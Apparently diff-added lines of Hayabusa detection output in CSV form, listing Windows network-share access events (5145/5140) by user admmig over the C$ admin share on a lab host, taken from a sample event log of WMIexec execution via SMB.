+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
